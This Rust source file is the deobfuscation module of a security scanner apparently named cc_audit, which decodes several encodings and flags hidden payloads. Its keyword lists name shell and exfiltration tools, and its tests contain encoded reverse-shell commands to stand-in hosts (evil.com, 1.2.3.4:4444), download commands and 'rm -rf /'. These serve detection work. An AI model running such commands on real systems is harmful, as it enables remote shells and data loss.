Skip to main content

cc_audit/
deobfuscation.rs

1use base64::Engine;
2use rayon::prelude::*;
3use regex::Regex;
4use std::sync::LazyLock;
5
/// Deobfuscation engine for deep scanning.
///
/// The type is a stateless unit struct: every method works purely on the text it is
/// handed, so values are free to create, copy, and share.
#[derive(Debug, Clone, Copy)]
pub struct Deobfuscator;
8
/// Upper bound on how many nested encoding layers a deep scan will unwrap.
///
/// Keeps the layer walk finite when encodings are stacked or refer back to
/// themselves (issue #128).
const MAX_DECODE_DEPTH: usize = 4;

/// Upper bound on how many decoded layers a single deep scan collects.
///
/// Guards against decode-bomb-style blowups on adversarial input.
const MAX_DECODE_RESULTS: usize = 256;
16
17static BASE64_PATTERN: LazyLock<Regex> = LazyLock::new(|| {
18    // Match both the standard (`+`/`/`) and URL-safe (`-`/`_`) alphabets, with or
19    // without `=` padding. A single run may be standard OR URL-safe; `decode_base64`
20    // tries every engine variant, so an over-broad match is harmless (it just fails
21    // to decode). Length >= 16 keeps the original minimum; the `< 20` guard in
22    // `decode_base64` still filters short candidates.
23    Regex::new(r"[A-Za-z0-9+/_-]{16,}={0,2}").expect("BASE64 regex")
24});
25static HEX_PATTERN: LazyLock<Regex> = LazyLock::new(|| {
26    Regex::new(r"(?:\\x[0-9A-Fa-f]{2}){4,}|(?:0x[0-9A-Fa-f]{2}){4,}").expect("HEX regex")
27});
28static URL_ENCODED_PATTERN: LazyLock<Regex> =
29    LazyLock::new(|| Regex::new(r"(?:%[0-9A-Fa-f]{2}){4,}").expect("URL encoded regex"));
30static UNICODE_ESCAPE_PATTERN: LazyLock<Regex> =
31    LazyLock::new(|| Regex::new(r"(?:\\u[0-9A-Fa-f]{4}){2,}").expect("Unicode escape regex"));
32static CHAR_CODE_PATTERN: LazyLock<Regex> =
33    LazyLock::new(|| Regex::new(r"String\.fromCharCode\s*\([\d,\s]+\)").expect("CharCode regex"));
34
35impl Deobfuscator {
36    pub fn new() -> Self {
37        Self
38    }
39
40    /// Deobfuscate content and return a list of decoded strings (single pass,
41    /// suspicious decodes only).
42    pub fn deobfuscate(&self, content: &str) -> Vec<DecodedContent> {
43        // Early return if no encoded patterns detected
44        if !self.has_encoded_patterns(content) {
45            return Vec::new();
46        }
47
48        // Parallel decode operations using Rayon
49        // Use a Vec of decoder functions that return Vec<DecodedContent>
50        vec![
51            self.decode_base64(content),
52            self.decode_hex(content),
53            self.decode_url(content),
54            self.decode_unicode_escapes(content),
55            self.decode_char_code(content),
56        ]
57        .into_par_iter()
58        .flatten()
59        .collect()
60    }
61
62    /// Single-pass decode of every valid layer, WITHOUT the suspicious filter.
63    ///
64    /// Used by the recursive walker so a non-suspicious intermediate layer can
65    /// still be fed back through the decoders.
66    fn deobfuscate_raw(&self, content: &str) -> Vec<DecodedContent> {
67        if !self.has_encoded_patterns(content) {
68            return Vec::new();
69        }
70
71        vec![
72            self.decode_base64_raw(content),
73            self.decode_hex_raw(content),
74            self.decode_url_raw(content),
75            self.decode_unicode_escapes_raw(content),
76            self.decode_char_code_raw(content),
77        ]
78        .into_par_iter()
79        .flatten()
80        .collect()
81    }
82
83    /// Iteratively decode nested/multi-layer encodings (issue #128).
84    ///
85    /// Each decoded layer is fed back through the decoders up to
86    /// [`MAX_DECODE_DEPTH`] layers. Multi-layer encoding (e.g. Base64 of a
87    /// hex-escaped command) is a standard obfuscation technique that a single
88    /// pass leaves hidden. A visited-set and a [`MAX_DECODE_RESULTS`] cap bound
89    /// the work against decode-bomb / self-referential inputs. Each returned
90    /// layer records its decode chain (e.g. `base64 -> hex`) in `encoding`.
91    fn deobfuscate_recursive(&self, content: &str) -> Vec<DecodedContent> {
92        let mut out = Vec::new();
93        let mut visited: std::collections::HashSet<String> = std::collections::HashSet::new();
94        let mut stack: Vec<(String, String, usize)> = self
95            .deobfuscate_raw(content)
96            .into_iter()
97            .map(|d| (d.decoded, d.encoding, 1usize))
98            .collect();
99
100        while let Some((text, chain, depth)) = stack.pop() {
101            if out.len() >= MAX_DECODE_RESULTS {
102                break;
103            }
104            // Skip layers already seen to avoid loops and redundant work.
105            if !visited.insert(text.clone()) {
106                continue;
107            }
108
109            // Feed this layer back through the decoders before consuming `text`.
110            if depth < MAX_DECODE_DEPTH {
111                for d in self.deobfuscate_raw(&text) {
112                    stack.push((d.decoded, format!("{} -> {}", chain, d.encoding), depth + 1));
113                }
114            }
115
116            out.push(DecodedContent {
117                original: content.chars().take(120).collect(),
118                decoded: text,
119                encoding: chain,
120            });
121        }
122
123        out
124    }
125
126    /// Check if content contains encoded patterns
127    fn has_encoded_patterns(&self, content: &str) -> bool {
128        // Use regex patterns for more accurate detection
129        BASE64_PATTERN.is_match(content)
130            || HEX_PATTERN.is_match(content)
131            || URL_ENCODED_PATTERN.is_match(content)
132            || UNICODE_ESCAPE_PATTERN.is_match(content)
133            || CHAR_CODE_PATTERN.is_match(content)
134    }
135
136    /// Keep only the decoded layers whose content looks suspicious.
137    ///
138    /// The public `decode_*` methods apply this so a single pass does not surface
139    /// benign decodes. The recursive walker instead works on the unfiltered
140    /// `decode_*_raw` output so a non-suspicious *intermediate* layer (e.g. a
141    /// hex-escaped string) is still fed back through the decoders (issue #128).
142    fn filter_suspicious(&self, items: Vec<DecodedContent>) -> Vec<DecodedContent> {
143        items
144            .into_iter()
145            .filter(|d| self.is_suspicious(&d.decoded))
146            .collect()
147    }
148
149    /// Decode base64 encoded strings (only suspicious decodes).
150    fn decode_base64(&self, content: &str) -> Vec<DecodedContent> {
151        self.filter_suspicious(self.decode_base64_raw(content))
152    }
153
154    /// Decode every valid-UTF-8 base64 run, without the suspicious filter.
155    fn decode_base64_raw(&self, content: &str) -> Vec<DecodedContent> {
156        let mut results = Vec::new();
157
158        for cap in BASE64_PATTERN.find_iter(content) {
159            let encoded = cap.as_str();
160            // Skip if too short or looks like random text
161            if encoded.len() < 20 {
162                continue;
163            }
164
165            if let Some(decoded_str) = Self::try_decode_base64_variants(encoded) {
166                results.push(DecodedContent {
167                    original: encoded.to_string(),
168                    decoded: decoded_str,
169                    encoding: "base64".to_string(),
170                });
171            }
172        }
173
174        results
175    }
176
177    /// Try decoding a Base64 candidate with every common engine variant and
178    /// return the first result that is valid UTF-8.
179    ///
180    /// Covers standard and URL-safe alphabets, padded and unpadded. The `base64`
181    /// crate rejects the "wrong" alphabet and mismatched padding, so a payload
182    /// using URL-safe or unpadded Base64 (both ubiquitous) would otherwise be
183    /// silently dropped even though the standard-padded form is decoded.
184    fn try_decode_base64_variants(encoded: &str) -> Option<String> {
185        use base64::engine::general_purpose::{
186            STANDARD, STANDARD_NO_PAD, URL_SAFE, URL_SAFE_NO_PAD,
187        };
188
189        let engines: [&base64::engine::GeneralPurpose; 4] =
190            [&STANDARD, &STANDARD_NO_PAD, &URL_SAFE, &URL_SAFE_NO_PAD];
191
192        engines
193            .iter()
194            .filter_map(|engine| engine.decode(encoded).ok())
195            .find_map(|bytes| String::from_utf8(bytes).ok())
196    }
197
198    /// Decode hex encoded strings (only suspicious decodes).
199    fn decode_hex(&self, content: &str) -> Vec<DecodedContent> {
200        self.filter_suspicious(self.decode_hex_raw(content))
201    }
202
203    /// Decode every valid-UTF-8 hex run (\\x or 0x format), unfiltered.
204    fn decode_hex_raw(&self, content: &str) -> Vec<DecodedContent> {
205        let mut results = Vec::new();
206
207        for cap in HEX_PATTERN.find_iter(content) {
208            let encoded = cap.as_str();
209
210            // Extract hex bytes
211            let hex_bytes: Vec<u8> = if encoded.starts_with("\\x") {
212                encoded
213                    .split("\\x")
214                    .filter(|s| !s.is_empty())
215                    .filter_map(|s| u8::from_str_radix(&s[..2.min(s.len())], 16).ok())
216                    .collect()
217            } else {
218                // 0x format
219                encoded
220                    .split("0x")
221                    .filter(|s| !s.is_empty())
222                    .filter_map(|s| u8::from_str_radix(&s[..2.min(s.len())], 16).ok())
223                    .collect()
224            };
225
226            if let Ok(decoded_str) = String::from_utf8(hex_bytes) {
227                results.push(DecodedContent {
228                    original: encoded.to_string(),
229                    decoded: decoded_str,
230                    encoding: "hex".to_string(),
231                });
232            }
233        }
234
235        results
236    }
237
238    /// Decode URL encoded strings (only suspicious decodes).
239    fn decode_url(&self, content: &str) -> Vec<DecodedContent> {
240        self.filter_suspicious(self.decode_url_raw(content))
241    }
242
243    /// Decode every valid-UTF-8 URL-encoded run, unfiltered.
244    fn decode_url_raw(&self, content: &str) -> Vec<DecodedContent> {
245        let mut results = Vec::new();
246
247        for cap in URL_ENCODED_PATTERN.find_iter(content) {
248            let encoded = cap.as_str();
249
250            // Manual URL decoding
251            let mut decoded_bytes = Vec::new();
252            let mut chars = encoded.chars().peekable();
253
254            while let Some(c) = chars.next() {
255                if c == '%' {
256                    let hex: String = chars.by_ref().take(2).collect();
257                    if let Ok(byte) = u8::from_str_radix(&hex, 16) {
258                        decoded_bytes.push(byte);
259                    }
260                } else {
261                    decoded_bytes.push(c as u8);
262                }
263            }
264
265            if let Ok(decoded_str) = String::from_utf8(decoded_bytes) {
266                results.push(DecodedContent {
267                    original: encoded.to_string(),
268                    decoded: decoded_str,
269                    encoding: "url".to_string(),
270                });
271            }
272        }
273
274        results
275    }
276
277    /// Decode unicode escape sequences (only suspicious decodes).
278    fn decode_unicode_escapes(&self, content: &str) -> Vec<DecodedContent> {
279        self.filter_suspicious(self.decode_unicode_escapes_raw(content))
280    }
281
282    /// Decode every unicode-escape run (\\uXXXX), unfiltered.
283    fn decode_unicode_escapes_raw(&self, content: &str) -> Vec<DecodedContent> {
284        let mut results = Vec::new();
285
286        for cap in UNICODE_ESCAPE_PATTERN.find_iter(content) {
287            let encoded = cap.as_str();
288            let mut decoded = String::new();
289
290            let mut chars = encoded.chars().peekable();
291            while let Some(c) = chars.next() {
292                if c == '\\' && chars.peek() == Some(&'u') {
293                    chars.next(); // consume 'u'
294                    let hex: String = chars.by_ref().take(4).collect();
295                    if let Ok(code_point) = u32::from_str_radix(&hex, 16)
296                        && let Some(ch) = char::from_u32(code_point)
297                    {
298                        decoded.push(ch);
299                    }
300                } else {
301                    decoded.push(c);
302                }
303            }
304
305            results.push(DecodedContent {
306                original: encoded.to_string(),
307                decoded,
308                encoding: "unicode".to_string(),
309            });
310        }
311
312        results
313    }
314
315    /// Decode JavaScript String.fromCharCode patterns (only suspicious decodes).
316    fn decode_char_code(&self, content: &str) -> Vec<DecodedContent> {
317        self.filter_suspicious(self.decode_char_code_raw(content))
318    }
319
320    /// Decode every String.fromCharCode run, unfiltered.
321    fn decode_char_code_raw(&self, content: &str) -> Vec<DecodedContent> {
322        let mut results = Vec::new();
323
324        for cap in CHAR_CODE_PATTERN.find_iter(content) {
325            let encoded = cap.as_str();
326
327            // Extract numbers from the pattern
328            let numbers: Vec<u32> = encoded
329                .split(|c: char| !c.is_ascii_digit())
330                .filter(|s| !s.is_empty())
331                .filter_map(|s| s.parse().ok())
332                .collect();
333
334            let decoded: String = numbers.iter().filter_map(|&n| char::from_u32(n)).collect();
335
336            results.push(DecodedContent {
337                original: encoded.to_string(),
338                decoded,
339                encoding: "charcode".to_string(),
340            });
341        }
342
343        results
344    }
345
346    /// Check if decoded content looks suspicious
347    fn is_suspicious(&self, content: &str) -> bool {
348        let suspicious_patterns = [
349            "eval",
350            "exec",
351            "bash",
352            "sh -c",
353            "/bin/",
354            "curl ",
355            "wget ",
356            "nc ",
357            "netcat",
358            "/dev/tcp",
359            "/dev/udp",
360            "base64 -d",
361            "python -c",
362            "ruby -e",
363            "perl -e",
364            "powershell",
365            "cmd.exe",
366            "rm -rf",
367            "chmod ",
368            "sudo ",
369            "password",
370            "secret",
371            "api_key",
372            "token",
373            "credential",
374            "http://",
375            "https://",
376            "ftp://",
377        ];
378
379        let content_lower = content.to_lowercase();
380        suspicious_patterns
381            .iter()
382            .any(|p| content_lower.contains(p))
383    }
384
385    /// Deep scan content - deobfuscate and return all findings
386    pub fn deep_scan(&self, content: &str, file_path: &str) -> Vec<crate::rules::Finding> {
387        use crate::engine::scanner::ScannerConfig;
388
389        let mut findings = Vec::new();
390        let config = ScannerConfig::new();
391
392        // First scan original content
393        findings.extend(config.check_content(content, file_path));
394
395        // Then scan every decoded layer, unwrapping nested encodings so a
396        // multi-layer payload cannot hide behind one decoding pass (issue #128).
397        for decoded in self.deobfuscate_recursive(content) {
398            let context = format!("{}:decoded:{}", file_path, decoded.encoding);
399
400            // Create findings for deobfuscated content
401            for mut finding in config.check_content(&decoded.decoded, &context) {
402                // Add note about deobfuscation
403                finding.message = format!(
404                    "{} [Decoded from {} encoded content]",
405                    finding.message, decoded.encoding
406                );
407                findings.push(finding);
408            }
409
410            // Also check for suspicious decoded content itself
411            if decoded.decoded.len() > 10 && self.is_highly_suspicious(&decoded.decoded) {
412                findings.push(crate::rules::Finding {
413                    id: "OB-DEEP-001".to_string(),
414                    severity: crate::rules::Severity::High,
415                    category: crate::rules::Category::Obfuscation,
416                    confidence: crate::rules::Confidence::Firm,
417                    name: "Obfuscated suspicious content".to_string(),
418                    location: crate::rules::Location {
419                        file: file_path.to_string(),
420                        line: 0,
421                        column: None,
422                    },
423                    code: decoded.original.chars().take(100).collect::<String>() + "...",
424                    message: format!(
425                        "Found {} encoded content that decodes to suspicious payload",
426                        decoded.encoding
427                    ),
428                    recommendation: "Review the decoded content for malicious commands or URLs"
429                        .to_string(),
430                    fix_hint: None,
431                    cwe_ids: vec!["CWE-116".to_string()],
432                    rule_severity: None,
433                    client: None,
434                    context: None,
435                });
436            }
437        }
438
439        findings
440    }
441
442    /// Check if content is highly suspicious (more specific than is_suspicious)
443    fn is_highly_suspicious(&self, content: &str) -> bool {
444        let highly_suspicious = [
445            "bash -i",
446            "/dev/tcp/",
447            "nc -e",
448            "rm -rf /",
449            "curl | bash",
450            "wget | sh",
451            "eval(base64",
452            "exec(decode",
453        ];
454
455        let content_lower = content.to_lowercase();
456        highly_suspicious.iter().any(|p| content_lower.contains(p))
457    }
458}
459
460impl Default for Deobfuscator {
461    fn default() -> Self {
462        Self::new()
463    }
464}
465
/// One decoded layer recovered from obfuscated input.
#[derive(Debug, Clone)]
pub struct DecodedContent {
    /// Source text this entry is associated with (for the single-pass decoders,
    /// the matched encoded run).
    pub original: String,
    /// Text obtained after decoding.
    pub decoded: String,
    /// Label of the encoding that was undone, e.g. `base64`; multi-layer results
    /// use a chain such as `base64 -> hex`.
    pub encoding: String,
}
473
474#[cfg(test)]
475mod tests {
476    use super::*;
477
478    #[test]
479    fn test_decode_base64() {
480        let deob = Deobfuscator::new();
481        // "curl http://evil.com" in base64
482        let content = "Y3VybCBodHRwOi8vZXZpbC5jb20=";
483        let results = deob.decode_base64(content);
484        assert!(!results.is_empty());
485        assert!(results[0].decoded.contains("curl"));
486    }
487
488    #[test]
489    fn test_decode_hex() {
490        let deob = Deobfuscator::new();
491        // "curl" in hex
492        let content = r"\x63\x75\x72\x6c\x20\x68\x74\x74\x70";
493        let results = deob.decode_hex(content);
494        assert!(!results.is_empty());
495        assert!(results[0].decoded.contains("curl"));
496    }
497
498    #[test]
499    fn test_decode_url() {
500        let deob = Deobfuscator::new();
501        // "curl http" URL encoded
502        let content = "%63%75%72%6c%20%68%74%74%70";
503        let results = deob.decode_url(content);
504        assert!(!results.is_empty());
505        assert!(results[0].decoded.contains("curl"));
506    }
507
508    #[test]
509    fn test_decode_charcode() {
510        let deob = Deobfuscator::new();
511        // String.fromCharCode for "eval"
512        let content = "String.fromCharCode(101,118,97,108)";
513        let results = deob.decode_char_code(content);
514        assert!(!results.is_empty());
515        assert!(results[0].decoded.contains("eval"));
516    }
517
518    #[test]
519    fn test_is_suspicious() {
520        let deob = Deobfuscator::new();
521        assert!(deob.is_suspicious("curl http://example.com"));
522        assert!(deob.is_suspicious("bash -c 'evil command'"));
523        assert!(deob.is_suspicious("password=secret123"));
524        assert!(!deob.is_suspicious("hello world"));
525    }
526
527    #[test]
528    fn test_deep_scan() {
529        let deob = Deobfuscator::new();
530        // Content with highly suspicious obfuscated payload: "bash -i >& /dev/tcp/x"
531        // Base64 for "bash -i >& /dev/tcp/evil.com/1234"
532        let content = "normal text\nYmFzaCAtaSA+JiAvZGV2L3RjcC9ldmlsLmNvbS8xMjM0 # hidden payload";
533        let findings = deob.deep_scan(content, "test.sh");
534        // Should find OB-DEEP-001 for highly suspicious decoded content
535        assert!(
536            findings
537                .iter()
538                .any(|f| f.id == "OB-DEEP-001" || f.message.contains("Decoded"))
539        );
540    }
541
542    #[test]
543    fn test_deep_scan_multi_layer_base64_of_hex() {
544        // Multi-layer obfuscation: a reverse-shell command is hex-escaped, then
545        // the hex-escaped string is Base64-encoded. A single decoding pass only
546        // reveals the (non-suspicious) hex-escaped layer; the real command stays
547        // hidden. Deep scan must iterate layers (issue #128).
548        let deob = Deobfuscator::new();
549        let cmd = "bash -i >& /dev/tcp/1.2.3.4/4444 0>&1";
550        let hex_escaped: String = cmd.bytes().map(|b| format!("\\x{:02x}", b)).collect();
551        let outer = base64::engine::general_purpose::STANDARD.encode(hex_escaped.as_bytes());
552        let content = format!("echo {} | sh", outer);
553
554        let findings = deob.deep_scan(&content, "payload.sh");
555        assert!(
556            findings.iter().any(|f| f.id == "OB-DEEP-001"),
557            "nested base64(hex(command)) must be decoded and flagged"
558        );
559    }
560
561    #[test]
562    fn test_deep_scan_detects_base64_wrapped_aws_key() {
563        // Regression for #146: a secret hidden inside a Base64 blob must still be
564        // caught. Before the deep-scan pre-filter fix, the encoded layer was
565        // dropped before the rule engine saw it, so SL-001 never fired.
566        let deob = Deobfuscator::new();
567        let secret = "aws_access_key_id=AKIAIOSFODNN7ABCDEFG";
568        let encoded = base64::engine::general_purpose::STANDARD.encode(secret.as_bytes());
569        let content = format!("export CREDS={encoded}");
570
571        let findings = deob.deep_scan(&content, "config.sh");
572        assert!(
573            findings.iter().any(|f| f.id == "SL-001"),
574            "Base64-wrapped AWS access key must be decoded and flagged as SL-001"
575        );
576    }
577
578    #[test]
579    fn test_deep_scan_detects_base64_wrapped_private_key() {
580        // Regression for #146: a PEM private-key header wrapped in Base64 must be
581        // decoded and flagged (SL-005), not silently dropped.
582        let deob = Deobfuscator::new();
583        let secret = "-----BEGIN RSA PRIVATE KEY-----\nMIIEpAIBAAKCAQEA\n";
584        let encoded = base64::engine::general_purpose::STANDARD.encode(secret.as_bytes());
585        let content = format!("blob = \"{encoded}\"");
586
587        let findings = deob.deep_scan(&content, "notes.md");
588        assert!(
589            findings.iter().any(|f| f.id == "SL-005"),
590            "Base64-wrapped private key header must be decoded and flagged as SL-005"
591        );
592    }
593
594    #[test]
595    fn test_deep_scan_single_layer_still_benign() {
596        // A plain, non-encoded benign line must not produce deep-scan findings
597        // even with recursive decoding enabled.
598        let deob = Deobfuscator::new();
599        let findings = deob.deep_scan("echo hello world", "safe.sh");
600        assert!(
601            !findings.iter().any(|f| f.id == "OB-DEEP-001"),
602            "benign content must not be flagged"
603        );
604    }
605
606    #[test]
607    fn test_deobfuscate_empty() {
608        let deob = Deobfuscator::new();
609        let results = deob.deobfuscate("normal text without obfuscation");
610        assert!(results.is_empty());
611    }
612
613    #[test]
614    fn test_default_trait() {
615        let deob = Deobfuscator;
616        assert!(!deob.is_suspicious("hello"));
617    }
618
619    #[test]
620    fn test_decode_unicode_escapes() {
621        let deob = Deobfuscator::new();
622        // "eval" in unicode escapes
623        let content = r"\u0065\u0076\u0061\u006c";
624        let results = deob.decode_unicode_escapes(content);
625        assert!(!results.is_empty());
626        assert!(results[0].decoded.contains("eval"));
627    }
628
629    #[test]
630    fn test_decode_base64_short_string() {
631        let deob = Deobfuscator::new();
632        // Short base64 string (less than 20 chars) should be skipped
633        let content = "YWJjZA=="; // "abcd" in base64
634        let results = deob.decode_base64(content);
635        assert!(results.is_empty());
636    }
637
638    #[test]
639    fn test_decode_base64_non_suspicious() {
640        let deob = Deobfuscator::new();
641        // Long base64 but decodes to non-suspicious content
642        let content = "dGhpcyBpcyBhIG5vcm1hbCBzYWZlIHRleHQ="; // "this is a normal safe text"
643        let results = deob.decode_base64(content);
644        assert!(results.is_empty());
645    }
646
647    #[test]
648    fn test_decode_base64_unpadded_standard() {
649        let deob = Deobfuscator::new();
650        // "curl http://evil.com" standard base64 with the trailing '=' padding
651        // stripped. STANDARD.decode rejects this (InvalidPadding), and the regex
652        // only matches a 24-char (aligned) prefix, so the FULL payload is never
653        // recovered — assert full equality, not a substring, to expose the gap.
654        let content = "Y3VybCBodHRwOi8vZXZpbC5jb20";
655        let results = deob.decode_base64(content);
656        assert!(
657            results.iter().any(|r| r.decoded == "curl http://evil.com"),
658            "unpadded standard base64 should decode to the full payload, got: {:?}",
659            results.iter().map(|r| &r.decoded).collect::<Vec<_>>()
660        );
661    }
662
663    #[test]
664    fn test_decode_base64_url_safe() {
665        let deob = Deobfuscator::new();
666        // "wget http://evil.com/xyz??? > /tmp/p" in URL-safe base64 (unpadded).
667        // Contains '_' (URL-safe alphabet). The standard alphabet regex matches
668        // only the run before '_' and STANDARD.decode rejects the URL-safe
669        // alphabet, so the full payload is never recovered — assert equality.
670        let content = "d2dldCBodHRwOi8vZXZpbC5jb20veHl6Pz8_ID4gL3RtcC9w";
671        let results = deob.decode_base64(content);
672        assert!(
673            results
674                .iter()
675                .any(|r| r.decoded == "wget http://evil.com/xyz??? > /tmp/p"),
676            "URL-safe base64 should decode to the full payload, got: {:?}",
677            results.iter().map(|r| &r.decoded).collect::<Vec<_>>()
678        );
679    }
680
681    #[test]
682    fn test_decode_hex_0x_format() {
683        let deob = Deobfuscator::new();
684        // "curl" in 0x format
685        let content = "0x630x750x720x6c0x200x680x740x740x70";
686        let results = deob.decode_hex(content);
687        assert!(!results.is_empty());
688        assert!(results[0].decoded.contains("curl"));
689    }
690
691    #[test]
692    fn test_is_highly_suspicious() {
693        let deob = Deobfuscator::new();
694        assert!(deob.is_highly_suspicious("bash -i >& /dev/tcp/"));
695        assert!(deob.is_highly_suspicious("rm -rf /"));
696        assert!(deob.is_highly_suspicious("curl | bash something"));
697        assert!(deob.is_highly_suspicious("wget | sh something"));
698        assert!(deob.is_highly_suspicious("nc -e /bin/bash"));
699        assert!(deob.is_highly_suspicious("eval(base64"));
700        assert!(deob.is_highly_suspicious("exec(decode"));
701        assert!(!deob.is_highly_suspicious("echo hello"));
702    }
703
704    #[test]
705    fn test_deobfuscate_with_base64() {
706        let deob = Deobfuscator::new();
707        // Contains suspicious base64
708        let content = "command=Y3VybCBodHRwOi8vZXZpbC5jb20="; // "curl http://evil.com"
709        let results = deob.deobfuscate(content);
710        assert!(!results.is_empty());
711    }
712
713    #[test]
714    fn test_deobfuscate_multiple_encodings() {
715        let deob = Deobfuscator::new();
716        // Content with both hex and base64
717        let content =
718            r"data=Y3VybCBodHRwOi8vZXZpbC5jb20=; exec \x63\x75\x72\x6c\x20\x68\x74\x74\x70";
719        let results = deob.deobfuscate(content);
720        // Should find results from both decoders
721        assert!(!results.is_empty());
722    }
723
724    #[test]
725    fn test_deep_scan_clean_content() {
726        let deob = Deobfuscator::new();
727        let content = "normal clean content without any issues";
728        let findings = deob.deep_scan(content, "test.txt");
729        // Should have no findings for clean content
730        assert!(findings.is_empty());
731    }
732
733    #[test]
734    fn test_deep_scan_with_suspicious_decoded() {
735        let deob = Deobfuscator::new();
736        // Content with moderately suspicious base64 (triggers is_suspicious but not is_highly_suspicious)
737        let content = "payload=Y3VybCBodHRwOi8vZXhhbXBsZS5jb20vZG93bmxvYWQuc2g="; // "curl http://example.com/download.sh"
738        let findings = deob.deep_scan(content, "test.sh");
739        // May or may not have findings depending on scanner rules
740        // Just verify no panic
741        let _ = findings;
742    }
743
744    #[test]
745    fn test_decoded_content_debug_trait() {
746        let content = DecodedContent {
747            original: "abc".to_string(),
748            decoded: "xyz".to_string(),
749            encoding: "base64".to_string(),
750        };
751        let debug_str = format!("{:?}", content);
752        assert!(debug_str.contains("DecodedContent"));
753        assert!(debug_str.contains("abc"));
754    }
755
756    #[test]
757    fn test_decoded_content_clone_trait() {
758        let content = DecodedContent {
759            original: "abc".to_string(),
760            decoded: "xyz".to_string(),
761            encoding: "base64".to_string(),
762        };
763        let cloned = content.clone();
764        assert_eq!(content.original, cloned.original);
765        assert_eq!(content.decoded, cloned.decoded);
766        assert_eq!(content.encoding, cloned.encoding);
767    }
768
769    #[test]
770    fn test_is_suspicious_various_patterns() {
771        let deob = Deobfuscator::new();
772        assert!(deob.is_suspicious("wget http://evil.com"));
773        assert!(deob.is_suspicious("nc -l 1234"));
774        assert!(deob.is_suspicious("netcat connection"));
775        assert!(deob.is_suspicious("/dev/tcp/evil"));
776        assert!(deob.is_suspicious("/dev/udp/evil"));
777        assert!(deob.is_suspicious("base64 -d | bash"));
778        assert!(deob.is_suspicious("python -c 'import os'"));
779        assert!(deob.is_suspicious("ruby -e 'exec'"));
780        assert!(deob.is_suspicious("perl -e 'system'"));
781        assert!(deob.is_suspicious("powershell.exe"));
782        assert!(deob.is_suspicious("cmd.exe /c"));
783        assert!(deob.is_suspicious("rm -rf /tmp"));
784        assert!(deob.is_suspicious("chmod 777 file"));
785        assert!(deob.is_suspicious("sudo rm"));
786        assert!(deob.is_suspicious("api_key=secret"));
787        assert!(deob.is_suspicious("token=abc123"));
788        assert!(deob.is_suspicious("credential_store"));
789        assert!(deob.is_suspicious("ftp://server"));
790    }
791
792    #[test]
793    fn test_decode_url_non_suspicious() {
794        let deob = Deobfuscator::new();
795        // URL encoded "hello world" (non-suspicious)
796        let content = "%68%65%6c%6c%6f%20%77%6f%72%6c%64";
797        let results = deob.decode_url(content);
798        // Should be empty because "hello world" is not suspicious
799        assert!(results.is_empty());
800    }
801
802    #[test]
803    fn test_decode_hex_non_suspicious() {
804        let deob = Deobfuscator::new();
805        // "hello" in hex - not suspicious
806        let content = r"\x68\x65\x6c\x6c\x6f";
807        let results = deob.decode_hex(content);
808        assert!(results.is_empty());
809    }
810
811    #[test]
812    fn test_decode_charcode_non_suspicious() {
813        let deob = Deobfuscator::new();
814        // "hello" in charCode - not suspicious
815        let content = "String.fromCharCode(104,101,108,108,111)";
816        let results = deob.decode_char_code(content);
817        assert!(results.is_empty());
818    }
819
820    #[test]
821    fn test_decode_unicode_non_suspicious() {
822        let deob = Deobfuscator::new();
823        // "ab" in unicode - not suspicious
824        let content = r"\u0061\u0062";
825        let results = deob.decode_unicode_escapes(content);
826        assert!(results.is_empty());
827    }
828
829    #[test]
830    fn test_deep_scan_original_content_finding() {
831        let deob = Deobfuscator::new();
832        // Content that triggers a rule via check_content
833        // Using sudo which should trigger PE-001
834        let content = "sudo rm -rf /important/files";
835        let findings = deob.deep_scan(content, "script.sh");
836        // Should find findings for sudo usage
837        assert!(!findings.is_empty());
838    }
839
840    #[test]
841    fn test_deobfuscate_with_url_encoding() {
842        let deob = Deobfuscator::new();
843        // URL encoded "curl http://evil.com" with mixed encoded/non-encoded characters
844        let content = "command=%63%75%72%6c%20http://evil.com";
845        let results = deob.deobfuscate(content);
846        // Should find URL-encoded suspicious content
847        assert!(results.iter().any(|r| r.encoding == "url"));
848    }
849
850    #[test]
851    fn test_deobfuscate_with_unicode_escapes() {
852        let deob = Deobfuscator::new();
853        // Unicode escape encoded "curl http"
854        let content = r"var cmd = '\u0063\u0075\u0072\u006c\u0020\u0068\u0074\u0074\u0070'";
855        let results = deob.deobfuscate(content);
856        // Should find unicode-encoded suspicious content
857        assert!(results.iter().any(|r| r.encoding == "unicode"));
858    }
859
860    #[test]
861    fn test_deobfuscate_with_charcode() {
862        let deob = Deobfuscator::new();
863        // String.fromCharCode for "curl http"
864        let content = "var x = String.fromCharCode(99,117,114,108,32,104,116,116,112)";
865        let results = deob.deobfuscate(content);
866        // Should find charcode-encoded suspicious content
867        assert!(results.iter().any(|r| r.encoding == "charcode"));
868    }
869
870    #[test]
871    fn test_url_decode_with_only_percent_encoded() {
872        let deob = Deobfuscator::new();
873        // URL with only percent-encoded characters (matches pattern (?:%[0-9A-Fa-f]{2}){4,})
874        // "curl http" fully percent-encoded
875        let content = "%63%75%72%6c%20%68%74%74%70%3a%2f%2f";
876        let results = deob.decode_url(content);
877        // Should decode correctly
878        assert!(!results.is_empty());
879        assert!(results[0].decoded.contains("curl"));
880        assert!(results[0].decoded.contains("http"));
881    }
882
883    #[test]
884    fn test_unicode_decode_multiple_escapes() {
885        let deob = Deobfuscator::new();
886        // Multiple consecutive unicode escapes (matches pattern (?:\\u[0-9A-Fa-f]{4}){2,})
887        // "curl" in unicode escapes
888        let content = r"\u0063\u0075\u0072\u006c\u0020\u0068\u0074\u0074\u0070";
889        let results = deob.decode_unicode_escapes(content);
890        // Should decode correctly
891        assert!(!results.is_empty());
892        assert!(results[0].decoded.contains("curl"));
893    }
894
895    #[test]
896    fn test_deobfuscate_all_encodings_combined() {
897        let deob = Deobfuscator::new();
898        // Content containing URL, unicode, charcode, hex, and base64 encodings
899        let content = r#"
900            url=%63%75%72%6c%20http
901            unicode=\u0065\u0076\u0061\u006c
902            charcode=String.fromCharCode(99,117,114,108)
903            hex=\x63\x75\x72\x6c\x20\x68\x74\x74\x70
904            base64=Y3VybCBodHRwOi8vZXZpbC5jb20=
905        "#;
906        let results = deob.deobfuscate(content);
907        // Should find multiple encodings
908        assert!(!results.is_empty());
909    }
910
911    #[test]
912    fn test_deep_scan_with_deobfuscated_rule_match() {
913        let deob = Deobfuscator::new();
914        // Base64 encoded content that contains sudo command
915        // "sudo rm -rf /" in base64
916        let base64_content = "c3VkbyBybSAtcmYgLw==";
917        let content = format!("execute={}", base64_content);
918        let findings = deob.deep_scan(&content, "test.sh");
919        // Should find findings from both original scan and decoded content
920        // The decoded content "sudo rm -rf /" should trigger PE-001
921        let has_decoded_finding = findings
922            .iter()
